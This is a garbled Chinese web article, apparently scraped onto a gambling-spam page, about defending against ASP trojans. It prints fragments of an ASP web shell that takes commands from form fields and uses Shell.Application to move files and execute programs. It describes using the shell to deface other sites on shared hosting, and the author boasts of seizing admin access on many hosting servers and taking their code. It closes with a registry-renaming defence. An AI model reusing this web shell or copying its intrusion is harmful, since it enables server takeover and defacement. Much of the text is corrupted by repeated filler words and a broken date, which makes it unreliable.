两款比较典型的ASP木马防范方法(3)

  • 时间:
  • 浏览:0
  • 来源:大发时时彩-大发时时彩平台_大发时时彩网投平台





作者:

CNETNews.com.cn

60 8-01-23 20:03:40

关键词: 木马清除 木马 盗号木马 木马病毒 木马专杀 木马病毒专杀 杀木马 木马查杀



  next if len(path)=2 then path=path & ""

  path2=right(szcmd3,len(szcmd3)-i)

  set fod2=shell2.namespace(path)

  set foditem=fod2.parsename(path2)

  fod1.movehere foditem

  response.write "command completed success!"

  end if

  %>

  <%

  szCMD5 = Request.Form("text5") 执行线程要指定路径

  szCMD6 = Request.Form("text6")

  if szcmd5<>"" and szcmd6<>"" then

  set shell3=server.createobject("shell.application") 建立shell对象

  shell3.namespace(szcmd5).items.item(szcmd6).invokeverb

  response.write "command completed success!"

  end if

  %>

  

  要查看目录,本来输入相应的目录,点发送命令就都不到了。这人 木马程都不到完成文件的COPY、MOVE,和执行线程。但不要 不要 不要 不要 命令全是能用,类式:del、net、netstat等。这人 木马程的功能随然简单,否则用它来黑有有两个多 网站是足够了。比如,让我门我门 都不到把网站的首页MOVE到其它地方,否则让我门我门 再COPY有有两个多 同名的黑客网页进去,就行了。  



  最要命的是这人 木马适用于任何虚拟主机之中,也本来说我只本来服务器中的有有两个多 虚拟空间的用户,我就都不到传这人 木马上去,并用它来修改其它任何用户的主页。不要 不要 不要 不要 不可能 哪些地方提供虚拟空间的服务商不到 打补丁励志的话 ,那简直死定了。

  

  然而在我的实践中发现,中国不要 不要 不要 不要 的虚拟空间服务商,有点痛 是不要 不要 小型的服务商都不到 打补丁。我利用这人 漏洞拿到了不要 不要 不要 不要 虚拟空间服务器的ADMIN,否则好心的帮让我门我门 补上漏洞。当然我也得到了我要我得到的东西——不要 不要 不要 不要 好的软件和代码。我现在用着的不要 不要 不要 不要 ASP线程本来从让我门我门 那上边偷下来,太难听了,应该说DOWN下来的才对。

  

  言归正传,让我门我门 应该怎么来防范这人 ASP后门木马线程呢?我就门 看一下它其中的这人 句代码:set shell=server.createobject("shell.application"),跟刚才的方法一样,让我门我门 本来把"shell.application"项和"shell.application.1"项改名或删除就都不到了。记住了,不可能 是改名,要改得繁杂不要 不要 ,暂且让黑客们一下就猜到了。